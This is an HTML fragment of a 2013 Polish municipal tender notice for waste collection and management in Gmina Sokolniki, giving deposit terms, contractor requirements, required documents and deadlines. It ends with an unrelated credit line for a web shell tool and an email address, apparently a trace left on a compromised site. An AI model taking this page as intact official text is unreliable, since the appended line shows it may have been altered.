   zbiórki odpadów komunalnych będzie utrudniony z powodu prowadzonych remontów dróg,
   dojazdów itp. W takich przypadkach Wykonawcy nie przysługują roszczenia z tytułu wzrostu
   kosztów realizacji przedmiotu umowy,
d) okazanie na żądanie Zamawiającego wszelkich dokumentów potwierdzających wykonywanie
   przedmiotu umowy zgodnie z określonymi przez Zamawiającego wymaganiami i przepisami
   prawa,
e) ponoszenie odpowiedzialności wobec Zamawiającego i osób trzecich za szkody na mieniu
    i zdrowiu osób trzecich, powstałe podczas i w związku z realizacją przedmiotu umowy 
    w zakresie określonym w Kodeksie Cywilnym i innych ustawach.
3.Zamawiający nie dopuszcza możliwości składania ofert wariantowych
4.Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej
5.Zamawiający  dopuszcza możliwości udzielania zamówień uzupełniających do wysokości 20 %
   wartości zamówienia podstawowego.
6. Informacja na temat możliwości powierzenia przez Wykonawcę wykonania części lub całości
    zamówienia podwykonawcom : 
    1) Wykonawca może powierzyć wykonanie części lub całości niniejszego zamówienia
         podwykonawcom. W takim przypadku zobowiązany jest do wskazania w formularzu
         ofertowym części zamówienia, której wykonanie zamierza powierzyć podwykonawcom. 
7. Zamawiający nie przewiduje przy wyborze oferty zastosowania aukcji elektronicznej.
8. Zamawiający przewiduje możliwość zmiany treści ogłoszenia o zamówienia.
9. Wymagania stawianie Wykonawcy : 
    1) wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi 
        i jakościowymi opisanymi dla przedmiotu zamówienia,
    2) wymagana jest należyta staranność przy realizacji zobowiązań umowy,
    3) ustalenia i decyzje dotyczące wykonania zamówienia uzgadniane będą przez Zamawiającego
        z ustanowionym przedstawiciel Wykonawcy,
    4) określenie przez Wykonawcę telefonów kontaktowych i numerów fax oraz innych ustaleń
        niezbędnych dla sprawnego i terminowego wykonania zamówienia, 
    5) Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas
        wykonania przedmiotu zamówienia..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  dopuszcza możliwości udzielania zamówień uzupełniających do wysokości 20 %
   wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.31.00-7, 90.53.30.00-2, 90.51.20.00-9, 90.51.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium w wysokości : 14.850,00 zł , słownie : czternaście
    tysięcy osiemset pięćdziesiąt złotych 00/100.
2.Wadium może być wnoszone w jednej lub kilku następujących formach : 
    1) pieniądzu,
    2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej
        z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
    3) gwarancjach bankowych,
    4) gwarancjach ubezpieczeniowych,
    5) poręczeniach udzielonych przed podmioty, o których mowa w art.6b ust.5 pkt.2 ustawy 
        z dnia 9 listopada 2000 r, o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości
        (Dz. U. z 2007 r, Nr 42 poz.275, ze zmianami).
3.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek  bankowy Rejonowego
    Banku Spółdzielczego w Lututowie, oddział w Sokolnikach,
    nr konta : 42 8256 0004 4200 0114 2000 0080 z adnotacją : wadium przetargowe -
    na wykonanie usługi - odbieranie i zagospodarowanie odpadów komunalnych
    pochodzących z terenu Gminy Sokolniki.
4.Wadium wniesione w pieniądzu Zamawiający przechowuje się na rachunku bankowym.                                                       


5.Wadium wniesione w pieniądzu należy złożyć  przed terminem składania
    ofert. Przy czym za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania
     na rachunku bankowym Zamawiającego. 
6.Wadium wniesione w pieniądzu, zostanie zwrócone wraz z odsetkami wynikającymi z umowy
   rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia 
   rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy 
   wskazany przez Wykonawcę.
7.Wadium wniesione w formie innej niż pieniądz należy złożyć w formie oryginału, razem z ofertą
    w osobnej kopercie. 
8.Polisa, poręczenie, gwarancja lub inny dokument stanowiący formę wadium winno zawierać 
   stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty 
   wadium zgodnie z warunkami specyfikacji istotnych warunków zamówienia, następuje jego  
   bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń ze strony gwaranta/poręczyciela. 
9.Oferta niezabezpieczona wadium w jednej lub kilku z podanych wyżej form zostanie wykluczona 
   bez rozpatrywania.
10.Zamawiający zwróci niezwłocznie wadium wszystkim Wykonawcom po wyborze
     najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego
     oferta zostanie wybrana jako najkorzystniejsza.
11.Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, Zamawiający zwróci 
     wadium niezwłocznie po zawarciu umowy.
12.Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed 
     upływem terminu składania ofert.
13.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została 
     wybrana odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach 
     określonych w ofercie, lub zawarcie umowy w sprawie zamówienia publicznego stało się
      niemożliwe z przyczyn leżących po stronie Wykonawcy.
14.W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte 
      w art.45 i art.46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy 
          prawa nakładają obowiązek ich posiadania : 
      a) jest wpisany do rejestru działalności regulowanej w zakresie odbierania odpadów
          komunalnych od właścicieli nieruchomości zgodnie z wymogami ustawy z dnia 13 września 
          1996 r, o utrzymaniu czystości i porządku w gminie (Dz. U z 2012 r, poz.391),
      b) posiada aktualne zezwolenie na transport, zbieranie i przetwarzanie  odpadów komunalnych
          zgodnie z wymogami ustawy z dnia 27 kwietnia 2001 r, o odpadach (Dz. U z 2010 r , Nr 185
          poz.1243, ze zmianami) lub równoważne , w tym wydane na podstawie wcześniejszych
          przepisów,
      c) jest wpisany do rejestru podmiotów zbierających zużyty sprzęt elektryczny i elektroniczny
          prowadzonego przez Głównego Inspektora Ochrony Środowiska zgodnie z ustawą z dnia 
          29 lipca 2005 r, o zużytym sprzęcie elektrycznym i elektronicznym (Dz. U z 2005 r, Nr 180,
          poz.1495, ze zmianami).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza żadnego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że : 
          a) będzie dysponował na czas realizacji zadania:
              - co najmniej 2 samochodami przystosowanymi do odbierania zmieszanych odpadów
                komunalnych,
             - co najmniej 2 samochodami przystosowanymi do odbierania selektywnie zebranych
               odpadów komunalnych,
             - co najmniej 1 pojazdem do odbierania odpadów komunalnych bez funkcji kompaktującej
             - pojazdami trwale i czytelnie oznakowanymi w widocznym miejscu nazwą firmy oraz
               danymi adresowymi i numerem telefonu podmiotu odbierającego odpady komunalne od
               właścicieli nieruchomości,
            -  pojazdami wyposażonymi w system monitoringu bazującego na systemie pozycjonowania
               satelitarnego, umożliwiającego trwałe zapisywanie, przechowywanie i odczytywanie
               danych o położeniu pojazdu i miejscach postoju oraz czujników zapisujących dane o
               miejscach wyładunku odpadów.
           b) będzie dysponował na czas realizacji zadania bazą magazynowo - transportową:
             - usytuowaną w gminie, z której terenu odbiera te odpady lub w odległości nie większej niż
               60 km od granicy tej gminy,
            -  usytuowaną na terenie, do którego posiada tytuł prawny,
            -  zabezpieczoną w sposób uniemożliwiający wstęp osobom nieupoważnionym,
            -  wyposażoną w miejsce przeznaczone do parkowania pojazdów, zabezpieczone przed
               emisją zanieczyszczeń do gruntu,
           -   wyposażaną w miejsce do magazynowania selektywnie zebranych odpadów z grupy 
               odpadów komunalnych, zabezpieczone przed emisją zanieczyszczeń do gruntu oraz
               zabezpieczone przed działaniem czynników atmosferycznych,
           -  wyposażaną w legalizowaną samochodową wagę najazdową, w przypadku gdy na terenie
               bazy następuje magazynowanie odpadów,
            -  wyposażoną w urządzenia lub systemy zapewniające zagospodarowanie wód opadowych 
                i  ścieków przemysłowych pochodzących z terenu bazy zgodnie z wymaganiami
               określonymi przepisami ustawy z dnia 18 lipca 2001 r. Prawo wodne ( Dz. U. z 2012 r. 
               poz. 145,951 i 1513 oraz z 2013 r. poz. 21),
             - wyposażoną w pomieszczenia socjalne dla pracowników odpowiadające liczbie
                zatrudnionych osób,
            -  na terenie której znajduje się punkt bieżącej konserwacji i napraw pojazdów oraz miejsce 
               do mycia i dezynfekcji pojazdów,o ile czynności te nie są wykonywane przez uprawnione 
                podmioty zewnętrzne poza terenem bazy magazynowo - transportowej,
                zgodnie z  Rozporządzeniem Ministra Środowiska z dnia 11.01.2013 r. w sprawie
                szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli
                nieruchomości .                                          
Zamawiający zastrzega sobie prawo do dokonywania weryfikacji zgodności ze stanem faktycznym treści oświadczeń złożonych przez Wykonawcę na potwierdzenie spełniania warunku dotyczącego dysponowania potencjałem technicznym. W przypadku stwierdzenia naruszenia prawdziwości złożonych oświadczeń Zamawiający skorzysta z uprawnienia  wynikającego z art.24 ust.2 pkt.3 lub 4 ustawy - Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza żadnego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony jeżeli Wykonawca wykaże posiadanie
      ubezpieczenia odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej 
      z przedmiotem zamówienia na kwotę minimum 500.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokumenty potwierdzające posiadanie uprawnień)pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień umowy w stosunku do treści oferty  dopuszczalna jest 
w przypadku 1) odstąpienia na wniosek Zamawiającego od realizacji części zamówienia i związanej z tym zmiany wynagrodzenia , pod warunkiem wystąpienia obiektywnych okoliczności, których Zamawiający nie mógł przewidzieć na etapie przygotowania postępowania, a które powodują, że wykonanie przedmiotu zamówienia bez ograniczenia zakresu zamówienia,powodowałoby  dla Zamawiającego niekorzystne skutki z uwagi na zamierzony cel realizacji przedmiotu zamówienia i związane z tym racjonalne wydatkowanie środków publicznych,
2) zmiany stawki VAT podatków od towarów i usług - wartość brutto przedmiotu umowy ulegnie zmianie odpowiednio do zmiany stawki podatku od towarów i usług,
3) wprowadzenie zmian w stosunku do (opisu przedmiotu zamówienia) - zał. nr 1, w zakresie wykonania prac nie wykraczających poza zakres przedmiotu zamówienia, w sytuacji konieczności zwiększenia usprawnienia procesu realizacji zamówienia,
4) innej zmiany prawa powszechnie obowiązującego wpływającej na zasady odbierania i zagospodarowania odpadów,
5) wprowadzenia zmian w stosunku do Opisu przedmiotu zamówienia w zakresie wykonywania prac nie wykraczających poza zakres przedmiot zamówienia, w sytuacji konieczności zwiększenia usprawnienia procesu realizacji zamówienia,
4.Dopuszcza się zmianę umowy w zakresie sposobu spełnienia przez Wykonawcę świadczenia odbierania i zagospodarowania odpadów w przypadku zmiany przepisów prawa powszechnie obowiązującego wpływających na sposób spełnienia świadczenia. 
5.Wszelkie zmiany niniejszej umowy wymagają pod rygorem nieważności formy pisemnej.
6.W trakcie trwania niniejszej umowy Wykonawca zobowiązuje się do pisemnego powiadamiania Zamawiającego o : 
1) zmianie siedziby lub nazwy firmy,
2) zmianie osób reprezentujących,
3) ogłoszeniu upadłości,
4) ogłoszeniu likwidacji,
5) zawieszeniu działalności,
6) wszczęcie postępowania układowego, w którym uczestnicy Wykonawca</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sokolniki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Sokolniki, ul. Marszałka Józefa Piłsudskiego 1, 98 - 420 Sokolniki, pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2013 godzina 10:00, miejsce: Urząd Gminy Sokolniki, ul. Marszałka Józefa Piłsudskiego 1, 98 - 420 Sokolniki, 
pokój nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com